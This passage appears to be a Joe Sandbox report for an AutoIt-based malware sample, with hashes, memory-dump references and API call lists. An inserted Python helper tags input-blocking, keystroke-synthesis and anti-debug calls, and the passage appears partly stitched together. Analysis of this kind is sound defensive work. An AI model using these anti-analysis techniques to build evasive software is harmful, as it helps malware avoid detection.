                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
• Opcode ID: eb68cdc9d97fd19683d1a8d4a20762a43dc633fbd05ab113e40784ca0251376e
• Instruction ID: 06e046305e33213ad93962533b0981f053a945e34968f74366b079f204a3d87f
• Opcode Fuzzy Hash: eb68cdc9d97fd19683d1a8d4a20762a43dc633fbd05ab113e40784ca0251376e
• Instruction Fuzzy Hash: 6CF05C716013182AD71017664C8CFEB7A5EDFC4761F00417AF505D2281C9604D04C6B4
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004BB25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 004BB270
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
• Opcode ID: 5f4384b2f0702e9f7f508d80bad38c70c63e81e76ea3b47dd19e25d840e17d46
• Instruction ID: 1b9d8d7b4c789dfcc664a0667326b5bd74e28069826071bcdf18391074ba380e
• Opcode Fuzzy Hash: 5f4384b2f0702e9f7f508d80bad38c70c63e81e76ea3b47dd19e25d840e17d46
• Instruction Fuzzy Hash: 2DF01D7180428EABDB059FA1C845BEE7BB4FF04305F00805AF965A9192C379C6129FA8
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B11FC), ref: 004B10D4
• CloseHandle.KERNEL32(?,?,004B11FC), ref: 004B10E9
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 206f22f8bb2d492af35d0d0aa5418885500346100b89745fc2b6d2f73904d464
• Instruction ID: 3cb0734448d63e247778ddff7dc0a4a81eff83d4746c5432c352243b5759396f
• Opcode Fuzzy Hash: 206f22f8bb2d492af35d0d0aa5418885500346100b89745fc2b6d2f73904d464
• Instruction Fuzzy Hash: 8DE04F72004600AEE7252B51FC45E737BA9EB04314B10882EF8A6844B1EB626C90DB58
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00486766,?,?,00000008,?,?,0048FEFE,00000000), ref: 00486998
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 577bd86aef0dfe995eb20024f01df7fa844869b866d5c1e84d6cd48747c698df
• Instruction ID: 2fde868bd7356e110fba211037cd49437d46ea3fd553c90ff60c4303780009bb
• Opcode Fuzzy Hash: 577bd86aef0dfe995eb20024f01df7fa844869b866d5c1e84d6cd48747c698df
• Instruction Fuzzy Hash: 0AB16D71510608DFD759DF28C48AB697BE0FF05364F268A59E899CF3A2C339D982CB44
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: b7ad00bc63940771bbf034b3959412eafbd72252760e265c5da90d1b061be74e
• Instruction ID: 997dc3dae4fb917fc90c876fc81eb281bca15e3f56e08eedb89e4d7a0ac7599c
• Opcode Fuzzy Hash: b7ad00bc63940771bbf034b3959412eafbd72252760e265c5da90d1b061be74e
• Instruction Fuzzy Hash: 5C125071A002299BDB14CF59C8806EEB7F5FF58710F14819BE849EB251EB389E81CF95
APIs
• BlockInput.USER32(00000001), ref: 004CEABD
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 494583637a2cc9a91af67f989f90b8d97a200e218ed3c8ce24f83bddcd45da30
• Instruction ID: e80af0ffd58daf2c1d1c4bb0e57a0ed52b69bc5b212050af92a1385664af0a4c
• Opcode Fuzzy Hash: 494583637a2cc9a91af67f989f90b8d97a200e218ed3c8ce24f83bddcd45da30
• Instruction Fuzzy Hash: 3CE012352002049FC710DF6AD844E5AB7D9AF58764F00841BFC45C7351D775A8458B95
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004703EE), ref: 004709DA
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
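The per-function "APIs" bullets above (GetLastError/FormatMessageW, SendInput/keybd_event, AdjustTokenPrivileges/CloseHandle, RaiseException, BlockInput, SetUnhandledExceptionFilter) are the part of this listing an analyst actually triages. The following Python is an added example, not Joe Sandbox code or report output: it parses bullets in exactly the `Name.MODULE(args), ref: address` shape shown above, using those nine lines as constructed sample input, annotates the calls the report's own signatures care about with their documented Win32 semantics, and decodes the NTSTATUS constant passed to RaiseException. The behaviour notes are Win32 documentation facts, not sandbox verdicts. One caveat the code carries as a comment: the sample is flagged as a compiled AutoIt script, and the AutoIt runtime exposes BlockInput() and Send() as built-in functions, so the presence of these imports tells you what the interpreter can do, not what this particular script did; the sandbox's behavioural signatures, not the import list, are the evidence for that.

```python
"""Triage helper for the "APIs" bullets of a Joe Sandbox "Executed Functions"
listing. Added example for this page; not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed input: the API bullet lines of the entries above, copied as printed.
SAMPLE_API_LINES = """\
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37F4
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004BB25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 004BB270
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B11FC), ref: 004B10D4
• CloseHandle.KERNEL32(?,?,004B11FC), ref: 004B10E9
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00486766,?,?,00000008,?,?,0048FEFE,00000000), ref: 00486998
• BlockInput.USER32(00000001), ref: 004CEABD
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004703EE), ref: 004709DA
"""

# Bullet shape used by the report: "• Api.MODULE(arg,arg,...), ref: VA".
# Arguments are 8-digit hex literals, "?" for values the emulator could not
# resolve, or a symbol name such as Function_000209E1.
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 semantics, not report output. Caveat: the AutoIt runtime
# (the report classifies this sample as a compiled AutoIt script) implements
# the BlockInput() and Send() built-ins on top of these same APIs, so every
# compiled AutoIt binary imports them whether or not the script calls them.
BEHAVIOUR_TAGS = {
    "BlockInput": "blocks keyboard and mouse input (report: often used to hinder debugging)",
    "AdjustTokenPrivileges": "enables or disables privileges on an access token",
    "SendInput": "synthesizes keyboard/mouse input events",
    "keybd_event": "synthesizes a single keystroke",
    "SetUnhandledExceptionFilter": ("installs a top-level exception filter; the filter is "
                                    "not invoked while a debugger is attached, a common anti-debug check"),
}

# NTSTATUS codes seen as the first RaiseException argument in the listing above.
NTSTATUS_NAMES = {0xC000000D: "STATUS_INVALID_PARAMETER"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple   # raw argument tokens as printed
    ref: int      # virtual address of the call site


def parse_api_lines(text):
    """Parse every API bullet in `text`; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["module"].upper(), args, int(m["ref"], 16)))
    return calls


def known_arg(arg):
    """Integer value of a resolved 8-digit hex argument, None for '?' or a symbol."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def triage(calls):
    """(call-site, API, note) for each call worth a second look, in listing order."""
    findings = []
    for c in calls:
        if c.api in BEHAVIOUR_TAGS:
            note = BEHAVIOUR_TAGS[c.api]
            if c.api == "BlockInput":  # fBlockIt: 1 blocks input, 0 re-enables it
                state = known_arg(c.args[0]) if c.args else None
                note += " (fBlockIt=%s)" % {1: "TRUE", 0: "FALSE"}.get(state, "?")
            findings.append((f"{c.ref:08X}", c.api, note))
        elif c.api == "RaiseException":
            code = known_arg(c.args[0]) if c.args else None
            findings.append((f"{c.ref:08X}", c.api,
                             f"raises {c.args[0]} = {NTSTATUS_NAMES.get(code, 'unknown NTSTATUS')}"))
    return findings


def calls_by_module(calls):
    """Group API names by the DLL they were resolved from."""
    by_mod = defaultdict(list)
    for c in calls:
        by_mod[c.module].append(c.api)
    return dict(by_mod)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for ref, api, note in triage(parsed):
        print(f"{ref}  {api:<28} {note}")
```

Feeding the whole "Executed Functions" section through parse_api_lines instead of the nine sample lines gives the same per-call annotations for every function entry; calls_by_module is a quick way to see which DLL families (USER32 input functions, ADVAPI32 token functions) a dump actually touches before opening it in a disassembler.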
• Opcode ID: 14f2f45087164fef4636e445db1c7a784c245e6d949a85e1f479f93fa08c2feb
• Instruction ID: f550c3b4988f1208fbb10dfbb77c4fe30e03dbf9f7e63b042924fcb0c6fbdd06
• Opcode Fuzzy Hash: 14f2f45087164fef4636e445db1c7a784c245e6d949a85e1f479f93fa08c2feb
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
• Instruction ID: c8863cd2f663eb224dd507b8df78637a8e69d5ccd62825792d97a74b30f427c6
• Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
• Instruction Fuzzy Hash: B15155B160C60596EB346669C8497FF27898B02304F98C91BD98EC7382C60DDE02C39F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID: 0&R
• API String ID: 0-2643562366
• Opcode ID: b9755088737084218ffa247947b79c01f704498ec848a218b197dba007841f61
• Instruction ID: 162542fd9920640220d2f62b1729e70b37e3493b265007cf05ecb3de5b0b3517
• Opcode Fuzzy Hash: b9755088737084218ffa247947b79c01f704498ec848a218b197dba007841f61
• Instruction Fuzzy Hash: 0621D5326206118BD728CE7AC92367A73E5AB64310F14862FE4A7C37D0DE79A904DB84
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e481f188fa4d5914befb2c10dec377dc67388b4f6111ef6c668b6d51554f6cd
• Instruction ID: 32d511af3a033c0dac44003ffc30aaf2a6a18bcc469e20c37ee525a73dd2522f
• Opcode Fuzzy Hash: 5e481f188fa4d5914befb2c10dec377dc67388b4f6111ef6c668b6d51554f6cd
• Instruction Fuzzy Hash: A9321821D29F014DD723A634C93233AA649AFB73C5F25D737E815B5EA5EB69C4C38204
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cee5b69e1a4612365e8699a8ea661a7f0b4ba5712a72660721a5278cb33754a3
• Instruction ID: 92a61f670a4e173b30ce44cf73e8628fc4b21fd04f1012af3fda995fca16f242
• Opcode Fuzzy Hash: cee5b69e1a4612365e8699a8ea661a7f0b4ba5712a72660721a5278cb33754a3
• Instruction Fuzzy Hash: 3E322871A001158BDF64CF2DC4D06BE77A1EB67310F28816BD49A8B391E23CDD82DB5A
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                • Opcode ID: e276dd8bb3d1505dd9a705f437f19a20144f52b2b94be99ef7e7e90cb502be6c
                                                                                • Instruction ID: fc70af1776c14a57baaef0b6c5301edf9ce4c9e18e981ba153c70ad8b2f8bb88
                                                                                • Opcode Fuzzy Hash: e276dd8bb3d1505dd9a705f437f19a20144f52b2b94be99ef7e7e90cb502be6c
                                                                                • Instruction Fuzzy Hash: D922D2B0A00609DFDF14CF65D941AAEB7F1FF44304F20453AE816A7292E73AAD19CB59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff63660cf8badddd273aa12d79fd15d731595fffbe839485b50ba9aa5906e1b1
                                                                                • Instruction ID: dc9fa1e866c4c154de479cfa947fc2aef93676aed21a66402e26f3697e1d5790
                                                                                • Opcode Fuzzy Hash: ff63660cf8badddd273aa12d79fd15d731595fffbe839485b50ba9aa5906e1b1
                                                                                • Instruction Fuzzy Hash: 3202D7B0E00105EBCF04DF55D881AAEBBB1FF44304F10856AE8569B391E739EE15CB99
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: b0d57244c041d6103903de4bff69845e21772627e7babb274d1ef9a53eb6e396
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: 7B91B8721080A34EDB39423E85340BFFFE15A523A131A479FD4FACA2E1FE18D955D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: 9a681ca2cb3c5d3946c34c14fade14d552293749611c48578645818f245ca216
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: C591A7722090A30EDB29427D85740BFFFE14A923A1319879FD4FACA2E1FD18D655D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 979cbf969df898c1c09f0f9d30af45ed980a5760caf275e7b6e8efecf2c6a8d7
                                                                                • Instruction ID: 8b4d60d3b533615589cd3e21cf6b4189ffc9ca26a78c728d7a12dd783ad6b1c0
                                                                                • Opcode Fuzzy Hash: 979cbf969df898c1c09f0f9d30af45ed980a5760caf275e7b6e8efecf2c6a8d7
                                                                                • Instruction Fuzzy Hash: ED61587124870596EA349A288995BFF3394DF41308FD0C91FE94ECB382D51DAE42C75E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38ccf875226729d7aaa7951bc1995f7b1d1a74edd6d49c6c038d25c1797ab736
                                                                                • Instruction ID: 9b5da4c3ea2a8aa136ab56f4591a2d82de1cba9d217556af96e5f80566c9ed06
                                                                                • Opcode Fuzzy Hash: 38ccf875226729d7aaa7951bc1995f7b1d1a74edd6d49c6c038d25c1797ab736
                                                                                • Instruction Fuzzy Hash: C4619A7124870962DA384A685895BFF23899F42748FD0CC5FE94ECB381E61E9D42C35E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: 2f4c76082f05d94f110613cfda6e90d6a867d0ac66fb809a259581a229a4a780
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: E981A9B25080A309DB2D423D85740BFFFE15A923A131A479FD4FACB2E1EE18C559D625
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 004D2B30
                                                                                • DeleteObject.GDI32(00000000), ref: 004D2B43
                                                                                • DestroyWindow.USER32 ref: 004D2B52
                                                                                • GetDesktopWindow.USER32 ref: 004D2B6D
                                                                                • GetWindowRect.USER32(00000000), ref: 004D2B74
                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 004D2CA3
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004D2CB1
                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2CF8
                                                                                • GetClientRect.USER32(00000000,?), ref: 004D2D04
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004D2D40
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D62
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004D2D75
